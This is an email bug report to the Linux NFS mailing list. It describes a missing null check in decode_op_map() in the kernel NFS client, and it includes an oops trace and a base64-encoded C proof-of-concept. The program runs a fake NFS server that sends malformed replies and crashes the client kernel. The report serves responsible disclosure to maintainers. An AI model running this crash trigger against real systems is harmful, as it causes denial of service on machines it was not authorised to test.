Received: by 2002:a05:6a10:5bc5:0:0:0:0 with SMTP id os5csp2105899pxb; Thu, 4 Nov 2021 14:10:54 -0700 (PDT) X-Google-Smtp-Source: ABdhPJym81dZF2L6367So8yZjQ1jiQl/W76zx4QDqLNeErUBIIv0AX04bF6PQsagAmhmPWa9Aj7Q X-Received: by 2002:a05:6e02:219a:: with SMTP id j26mr29717121ila.287.1636060254268; Thu, 04 Nov 2021 14:10:54 -0700 (PDT) ARC-Seal: i=1; a=rsa-sha256; t=1636060254; cv=none; d=google.com; s=arc-20160816; b=0kI+W/wJUh7StZbgPnvyEHk4r3PYi+/jKIGeFdEuW3u84/IBtIePKAk1f2xaplf33r 9X1zPG8nutuzD054QNRrQDzabNxUiJx67z6/phAdyxpOdw54j3NmLXXPTKtIE/8mAsSI 3FMecvqo825ZE6Qc0bs9Hz5IjK7Xr1wgq5nbaBwGVO5gtGULaJjBunsm21t4N8Y1B2Nm Xiwwe+/W+Ozl4kuxKgN7qy0AIaEjdH1hIobNjOYrijD/NPhat1t577AXsgM8aJxZ7cxM YgSLqHUbNaWiByniTa+LwSGouK4TGxUvRuWlbgam8Iu5tSgio6w012zPn/w8O6QwF3CY 7tsw== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816; h=list-id:precedence:message-id:date:mime-version:subject:reply-to :from:cc:to; bh=gPFARX0kfI1q+UBnkRoAuofXSntyF5vNC+ZawHe4bpA=; b=OMbMga6ephJrqkw3J/d9gkApwc1qpyFkwrBmOfYN4m4CVscXV8la3Y/9uvXDCLQqWg pLLt/HOO6Ix/kcqmrc+QpnayOy83YeafbUexbOU9jYBP5eTzmfboDfdLR4AnJKg0WFXs r6vpkSVDa9dueiBgcjjIQw+PXv3/fxz/W6E3gEFhPLudBn5x8FwTBkJxPdSafOnC2Ue2 rtQx+q9UrettZmi5eISZ2VCxhhVQvhnnjIWSOpSnXRr8RN4b0hYMeG95flHEbWHaLLA1 MbGuFNU8J8XY8X46pTMxfgAwSKvXOCn9uwRAXt4ZUxoKLyCHNpjygKVqj3WTwE0y7t/O hh9g== ARC-Authentication-Results: i=1; mx.google.com; spf=pass (google.com: domain of linux-nfs-owner@vger.kernel.org designates 23.128.96.18 as permitted sender) smtp.mailfrom=linux-nfs-owner@vger.kernel.org; dmarc=fail (p=NONE sp=NONE dis=NONE) header.from=csail.mit.edu Return-Path: Received: from vger.kernel.org (vger.kernel.org. [23.128.96.18]) by mx.google.com with ESMTP id t34si11906787jal.104.2021.11.04.14.10.38; Thu, 04 Nov 2021 14:10:54 -0700 (PDT) Received-SPF: pass (google.com: domain of linux-nfs-owner@vger.kernel.org designates 23.128.96.18 as permitted sender) client-ip=23.128.96.18; Authentication-Results: mx.google.com; spf=pass (google.com: domain of linux-nfs-owner@vger.kernel.org designates 23.128.96.18 as permitted sender) smtp.mailfrom=linux-nfs-owner@vger.kernel.org; dmarc=fail (p=NONE sp=NONE dis=NONE) header.from=csail.mit.edu Received: (majordomo@vger.kernel.org) by vger.kernel.org via listexpand id S231849AbhKDVMn (ORCPT + 99 others); Thu, 4 Nov 2021 17:12:43 -0400 Received: from outgoing-stata.csail.mit.edu ([128.30.2.210]:55369 "EHLO outgoing-stata.csail.mit.edu" rhost-flags-OK-OK-OK-OK) by vger.kernel.org with ESMTP id S230162AbhKDVMn (ORCPT ); Thu, 4 Nov 2021 17:12:43 -0400 Received: from c-24-60-30-97.hsd1.ma.comcast.net ([24.60.30.97] helo=crash.local) by outgoing-stata.csail.mit.edu with esmtpsa (TLS1.2:DHE_RSA_AES_256_CBC_SHA256:256) (Exim 4.82) (envelope-from ) id 1mijzm-000Sna-4B; Thu, 04 Nov 2021 17:10:02 -0400 Received: from crash.local (localhost [127.0.0.1]) by crash.local (Postfix) with ESMTP id 941FB11E96830; Thu, 4 Nov 2021 17:10:01 -0400 (EDT) To: Trond Myklebust , Anna Schumaker cc: linux-nfs@vger.kernel.org From: rtm@csail.mit.edu Reply-To: rtm@csail.mit.edu Subject: another NFS client RPC bug MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="=-=-=" Date: Thu, 04 Nov 2021 17:10:01 -0400 Message-ID: <8046.1636060201@crash.local> Precedence: bulk List-ID: X-Mailing-List: linux-nfs@vger.kernel.org --=-=-= Content-Type: text/plain In decode_op_map() in fs/nfs/nfs4xdr.c: uint32_t bitmap_words; ...; bitmap_words = be32_to_cpup(p++); if (bitmap_words > NFS4_OP_MAP_NUM_WORDS) return -EIO; ...; p = xdr_inline_decode(xdr, 4 * bitmap_words); for (i = 0; i < bitmap_words; i++) op_map->u.words[i] = be32_to_cpup(p++); The return value from xdr_inline_decode() isn't checked, so there can be a null-pointer dereference if there aren't enough bytes left in the RPC message. I've attached a program that produces the bug on my 5.15 machine: # cc nfs_2.c # ./a.out mount:mount.nfs: timeout set for Thu Nov 4 21:10:28 2021 mount.nfs: trying text-based options 'vers=4.2,addr=127.0.0.1,clientaddr=127.0.0.1' [ 29.133142] random: fast init done accept returned 4 proc 0 proc 1 [ 19.298637] Unable to handle kernel access to user memory without uaccess routines at virtual address 0000000000000000 [ 19.316686] Oops [#1] [ 19.322023] Modules linked in: [ 19.329310] CPU: 0 PID: 61 Comm: mount.nfs Not tainted 5.15.0-rc7-dirty #15 [ 19.341196] Hardware name: ucbbar,riscvemu-bare (DT) [ 19.350236] epc : decode_op_map+0x78/0xba [ 19.357992] ra : decode_op_map+0x62/0xba [ 19.365744] epc : ffffffff8022d93c ra : ffffffff8022d926 sp : ffffffd0005736e0 ... [ 19.504650] status: 0000000200000121 badaddr: 0000000000000000 cause: 000000000000000d [ 19.518135] [] decode_op_map+0x78/0xba [ 19.528276] [] nfs4_xdr_dec_exchange_id+0x1a6/0x57e [ 19.540304] [] rpcauth_unwrap_resp_decode+0x12/0x1a [ 19.552386] [] rpcauth_unwrap_resp+0x12/0x1a [ 19.563960] [] call_decode+0x112/0x176 [ 19.574123] [] __rpc_execute+0x76/0x216 [ 19.584286] [] rpc_execute+0x58/0x7e [ 19.594443] [] rpc_run_task+0x12c/0x16c [ 19.604541] [] nfs4_run_exchange_id+0x1d8/0x262 [ 19.616149] [] _nfs4_proc_exchange_id+0x24/0x2ba [ 19.627761] [] nfs4_proc_exchange_id+0x30/0x50 [ 19.639397] [] nfs41_discover_server_trunking+0x1c/0xa8 [ 19.651468] [] nfs4_discover_server_trunking+0x7c/0x1e8 [ 19.663549] [] nfs4_init_client+0x92/0xf6 [ 19.673663] [] nfs_get_client+0x36a/0x394 [ 19.683817] [] nfs4_set_client+0xd6/0x13e [ 19.693935] [] nfs4_create_server+0xb8/0x208 [ 19.705529] [] nfs4_try_get_tree+0x16/0x4c [ 19.717147] [] nfs_get_tree+0x34a/0x3ac [ 19.727243] [] vfs_get_tree+0x18/0x88 [ 19.737351] [] path_mount+0x4f4/0x77a [ 19.747521] [] do_mount+0x4c/0x7e [ 19.757264] [] sys_mount+0xca/0x14e [ 19.767418] [] ret_from_syscall+0x0/0x2 --=-=-= Content-Type: application/octet-stream Content-Disposition: attachment; filename=nfs_2.c Content-Transfer-Encoding: base64 I2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPHVuaXN0ZC5o PgojaW5jbHVkZSA8c3RyaW5nLmg+CiNpbmNsdWRlIDxzeXMvc29ja2V0Lmg+CiNpbmNsdWRlIDxz eXMvaW9jdGwuaD4KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4KI2luY2x1ZGUgPHN5cy93YWl0Lmg+ CiNpbmNsdWRlIDxzeXMvcmVzb3VyY2UuaD4KCnVuc2lnbmVkIGxvbmcgbG9uZyBhYWFbXSA9IHsK MHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAow eDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4 MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweGM0ZmZmZmZmMDAwMDAwMDB1 bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVs bCwKMHgwdWxsLAoweGZmZmZmZmZmZDVmZmZmZmZ1bGwsCjB4MHVsbCwKMHgwdWxsLAoweGZiZmZm ZmZmZmVmZmZmZmZ1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAow eDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4 MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgw dWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1 bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAp9OwppbnQgaWlpID0g MDsKCmludCByZWFkbihpbnQgZmQsIGNoYXIgKmJ1ZiwgaW50IG4pIHsKICBpbnQgb3JpZyA9IG47 CiAgd2hpbGUobiA+IDApewogICAgaW50IGNjID0gcmVhZChmZCwgYnVmLCBuKTsKICAgIGlmKGNj IDw9IDApIHsgcGVycm9yKCJyZWFkIik7IHJldHVybiAtMTsgfQogICAgbiAtPSBjYzsKICAgIGJ1 ZiArPSBjYzsKICB9CiAgcmV0dXJuIG9yaWc7Cn0KCmludAptYWluKCl7CiAgc3RydWN0IHJsaW1p dCByOwogIHIucmxpbV9jdXIgPSByLnJsaW1fbWF4ID0gMDsKICBzZXRybGltaXQoUkxJTUlUX0NP UkUsICZyKTsKCiAgaW50IHMgPSBzb2NrZXQoQUZfSU5FVCwgU09DS19TVFJFQU0sIDApOwogIHN0 cnVjdCBzb2NrYWRkcl9pbiBzaW47CiAgbWVtc2V0KCZzaW4sIDAsIHNpemVvZihzaW4pKTsKICBz aW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7CiAgc2luLnNpbl9wb3J0ID0gaHRvbnMoMjA0OSk7CiAg aWYoYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnNpbiwgc2l6ZW9mKHNpbikpIDwgMCl7CiAg ICBwZXJyb3IoImJpbmQiKTsgZXhpdCgxKTsKICB9CiAgbGlzdGVuKHMsIDEwKTsKICBzeW5jKCk7 IHNsZWVwKDEpOyBzbGVlcCgxKTsgc2xlZXAoMSk7CgogIGlmKGZvcmsoKSA9PSAwKXsKICAgIGlm KHN5c3RlbSgiZWNobyAtbiBtb3VudDogOyBtb3VudCAtdiAtdCBuZnMgMTI3LjAuMC4xOi90bXAg L21udCIpID09IDApewogICAgICBzeXN0ZW0oImVjaG8gLW4gbHM6IDsgbHMgLWwgL21udC8uIC9t bnQveiIpOwogICAgICBzeXN0ZW0oImVjaG8gLW4gZWNobzogOyBlY2hvIGhpID4gL21udC94Iik7 CiAgICAgIHN5c3RlbSgiZWNobyAtbiB1bW91bnQ6IDsgdW1vdW50IC9tbnQiKTsKICAgIH0KICAg IGV4aXQoMCk7CiAgfQoKICBpZihmb3JrKCkgPT0gMCl7CiNkZWZpbmUgTkFBIDY0CiAgICB1bnNp Z25lZCBsb25nIGxvbmcgYWFbTkFBXTsKICAgIGZvcihpbnQgaSA9IDA7IGkgPCBOQUE7IGkrKykg YWFbaV0gPSBhYWFbaWlpKytdOwogICAgaW50IGlpID0gMDsKCiAgICBzb2NrbGVuX3Qgc2lubGVu ID0gc2l6ZW9mKHNpbik7CiAgICBpbnQgczEgPSBhY2NlcHQocywgKHN0cnVjdCBzb2NrYWRkciAq KSAmc2luLCAmc2lubGVuKTsKICAgIHByaW50ZigiYWNjZXB0IHJldHVybmVkICVkXG4iLCBzMSk7 CiAgICBpZihzMSA8IDApIHsgcGVycm9yKCJhY2NlcHQiKTsgZXhpdCgxKTsgfQogICAgY2xvc2Uo cyk7CiAgCiAgICB3aGlsZSgxKXsKICAgICAgdW5zaWduZWQgaW50IGlsZW47CiAgICAgIGlmKHJl YWRuKHMxLCAoY2hhciopJmlsZW4sIDQpIDwgMCkgYnJlYWs7CiAgICAgIGlsZW4gPSBudG9obChp bGVuKTsKICAgICAgaWxlbiAmPSAweDdmZmZmZmZmOwogICAgICBjaGFyIGlidWZbMTAyNF07CiAg ICAgIGlmKHJlYWRuKHMxLCAoY2hhciopaWJ1ZiwgaWxlbikgPCAwKSBicmVhazsKICAgICAgaW50 IHhpZCA9ICooaW50KikoaWJ1ZiswKTsKICAgICAgaW50IHByb2MgPSBudG9obCgqKGludCopKGli dWYrMjApKTsKICAgICAgcHJpbnRmKCJwcm9jICVkXG4iLCBwcm9jKTsKICAgICAgCiAgICAgIGNo YXIgb2J1ZlsxMjhdOwogICAgICBpbnQgb2xlbiA9IHNpemVvZihvYnVmKTsKICAgICAgaW50IGR1 bW15ID0gaHRvbmwob2xlbiB8IDB4ODAwMDAwMDApOwogICAgICB3cml0ZShzMSwgJmR1bW15LCA0 KTsKICAgICAgbWVtc2V0KG9idWYsIDB4ZmYsIHNpemVvZihvYnVmKSk7CiAgICAgIGZvcihpbnQg aSA9IDA7IGkrOCA8PSBzaXplb2Yob2J1ZikgJiYgaWkgPCBOQUE7IGkgKz0gOCkKICAgICAgICAq KHVuc2lnbmVkIGxvbmcgbG9uZyAqKShvYnVmICsgaSkgXj0gYWFbaWkrK107CiAgICAgICooaW50 Kikob2J1ZiswKSA9IHhpZDsKICAgICAgKihpbnQqKShvYnVmKzQpID0gaHRvbmwoMSk7IC8vIFJF UExZCiAgICAgICooaW50Kikob2J1Zis4KSA9IGh0b25sKDApOyAvLyBNU0dfQUNDRVBURUQKICAg ICAgKihpbnQqKShvYnVmKzEyKSA9IGh0b25sKDApOyAvLyBvcGFxdWVfYXV0aCBmbGF2b3IgPSBB VVRIX05VTEwKICAgICAgKihpbnQqKShvYnVmKzE2KSA9IGh0b25sKDApOyAvLyBvcGFxdWVfYXV0 aCBsZW5ndGgKICAgICAgKihpbnQqKShvYnVmKzIwKSA9IGh0b25sKDApOyAvLyBTVUNDRVNTCiAg ICAgIGlmKHdyaXRlKHMxLCBvYnVmLCBvbGVuKTw9MCkgcGVycm9yKCJ3cml0ZSIpOwogICAgfQog ICAgZXhpdCgxKTsKICB9CiAgY2xvc2Uocyk7CiAgc2xlZXAoNyk7Cn0K --=-=-=--